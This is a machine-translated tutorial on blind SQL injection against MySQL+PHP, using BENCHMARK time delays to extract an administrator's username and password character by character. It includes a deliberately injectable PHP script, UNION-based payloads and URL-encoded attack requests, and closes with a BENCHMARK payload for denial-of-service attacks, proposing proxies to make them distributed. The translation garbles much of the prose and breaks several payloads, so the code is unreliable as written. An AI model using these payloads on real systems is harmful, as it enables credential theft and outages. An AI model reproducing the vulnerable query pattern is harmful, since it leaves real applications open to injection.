Usage of BENCHMARK function in MYSQL

By: SuperHei from: http://www.4ngel.net/

Part 1

Injecting with time delay --- use of BENCHMARK function in Injection

I. Preface/ideas

If you read angel's "_ blank> SQL Injection with MySQL", you will find that the Injection of mysql + php usually returns an error message, the union query replaces the fields in the original query statement and directly outputs sensitive information. However, when the host is set to not display the error message: display_errors = Off. In some codes, after SQL queries, the query results are simply judged, rather than the query results. We can inject the following method to get nothing. We can use a time delay to determine the injection.

The main idea of this technology: By using the execution time extension function in the constructed statement, if the judgment we submit is correct, the mysql query time will be postponed, if the submitted statement is correct, the time-delay function will not be executed and the query statement will not be postponed. In this way, we can determine the injection.

Ii. BENCHMARK Function

You can see the following descriptions in the MySQL reference manual:

--------------------------------------------------------------------------------

BENCHMARK (count, expr)
The BENCHMARK () function repeats the countTimes execution expression expr, which can be used to time how fast the MySQL processing expression is. The result value is always 0. Intended for mysql customers, it reports the query execution time.
Mysql> select BENCHMARK (1000000, encode ("hello", "goodbye "));
+ ---------------------------------------------- +
| BENCHMARK (1000000, encode ("hello", "goodbye") |
+ ---------------------------------------------- +
| 0 |
+ ---------------------------------------------- +
1 row in set (4.74 sec)

The report time is the client time, not the CPU time on the server. It may be wise to execute BENCHMARK () several times, and note that the server load has to be explained again.

--------------------------------------------------------------------------------

As long as we set the count parameter to a greater value, the execution time will become longer. Next we will look at the effect of execution in mysql:

Mysql> select md5 (test );
+ ---------------------------------- +
| Md5 (test) |
+ ---------------------------------- +
| 098f6bcd4621d373cade4e832627b4f6 |
+ ---------------------------------- +
1 row in set (0.00 sec) <----------- the execution time is 0.00 sec

Mysql> select benchmark (500000, md5 (test ));
+ ------------------------------------ +
| Benchmark (500000, md5 (test) |
+ ------------------------------------ +
| 0 |
+ ------------------------------------ +
1 row in set (6.55 sec) <------------ the execution time is 6.55 sec
 

It can be seen that the time for executing 500000 times with benchmark is significantly longer than the normal execution time.

Iii. Examples

First, let's look at a simple php code:

<? Php
$ Servername = "localhost ";
$ Dbusername = "root ";
$ Dbpassword = "";
$ Dbname = "injection ";

Mysql_connect ($ servername, $ dbusername, $ dbpassword) or die ("database connection failed ");

$ SQL = "SELECT * FROM article WHERE articleid = $ id ";
$ Result = mysql_db_query ($ dbname, $ SQL );
$ Row = mysql_fetch_array ($ result );

If (! $ Row)
{
Exit;
}
?>
 

The database injection structure and content are as follows:

# Database: 'inobjection'
#

#--------------------------------------------------------

#
# 'Article'
#

Create table 'Article '(
'Articleid' int (11) not null auto_increment,
'Title' varchar (100) not null default,
'Content' text not null,
Primary key ('articleid ')
) TYPE = MyISAM AUTO_INCREMENT = 3;

#
# Export 'Article' data from a table'
#

Insert into 'Article' VALUES (1. I am a child who does not like reading books. China's education system is really fucking lagging behind! If I am an education minister. I want to dismiss all the teachers! Operation ~);
Insert into 'Article' VALUES (2. I hate you, I hate you, what are you );

#--------------------------------------------------------

#
# Table structure 'user'
#

Create table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default,
'Password' varchar (20) not null default,
Primary key ('userid ')
) TYPE = MyISAM AUTO_INCREMENT = 3;

#
# Export the data 'user' in the table'
#

Insert into 'user' VALUES (1, angel, mypass );
Insert into 'user' VALUES (2, 4 ngel, mypass2 );
 

The Code simply checks whether the query result exists. Assume that display_errors = Off has been set. We cannot directly output sensitive information using the replacement of union select (ps: This is not to say that we do not use union, because mysql does not support subqueries) or the injection is determined based on the difference returned by the error message. We use the union query to insert the BENCHMARK function statement to determine the injection:

Id = 1 union select 1, benchmark (500000, md5 (test), 1 from user where userid = 1 and ord (substring (username,) = 97 /*
 

In the preceding statement, you can guess whether the ascii value of the first letter of the username with userid 1 is 97. If it is 97, the above query will be delayed due to the benchmark function. If it is not 97, there will be no latency, so that we can finally guess the Administrator's username and password. Note: It is very dangerous to use the number in benchmark (500000, md5 (test, because the administrator can filter injection failures as needed, test can be represented in other hexadecimal notation, such as hexadecimal notation. The final structure is as follows:

Http: // 127.0.0.1/test/show. php? Id = 1% 20 union % 20 select % 201, benchmark (500000, md5 (0x41 )), 1% 20 from % 20 user % 20 where % 20 userid = 1% 20and % 20ord (substring (username, 97%) = 20 /*
 

The execution speed is very slow. The ascii value of the first letter of the username with userid 1 is 97.

Note: when using the union select statement, we must know the number of fields in the original statement query table. In the past, we used to judge based on the error message, 1. We keep increasing the number of fields. If the number of fields is correct, no errors will be returned. But we cannot use this method now. Then we can use benchmark (), we construct the union select benchmark (500000, md5 (0x41) in this way. We are adding 1. If the number of fields is correct, the benchmark () execution will be delayed, in this way, we can determine the number of fields.

Part II

Use the BENCHMARK function for ddos attacks

In fact, the idea is very simple: in BENCHMARK (count, expr), we only need to set count to execute a large enough number of times, which can cause dos attacks. If we use a proxy or other resources to submit at the same time, it is a ddos attack. It is estimated that the database will soon be suspended. However, the premise is that the injection can be performed. Statement:

Http: // 127.0.0.1/test/show. php? Id = 1% 20 union % 20 select % 99999999, benchmark (, md5 (0x41 ))
 

Summary

The main idea of this article comes from _ blank> http://www.ngssoftware.com/papers/more_advanced_ SQL _injection.pdf ). For more information about mysql + php Injection, see angel's article _ blank> SQL Injection with MySQL.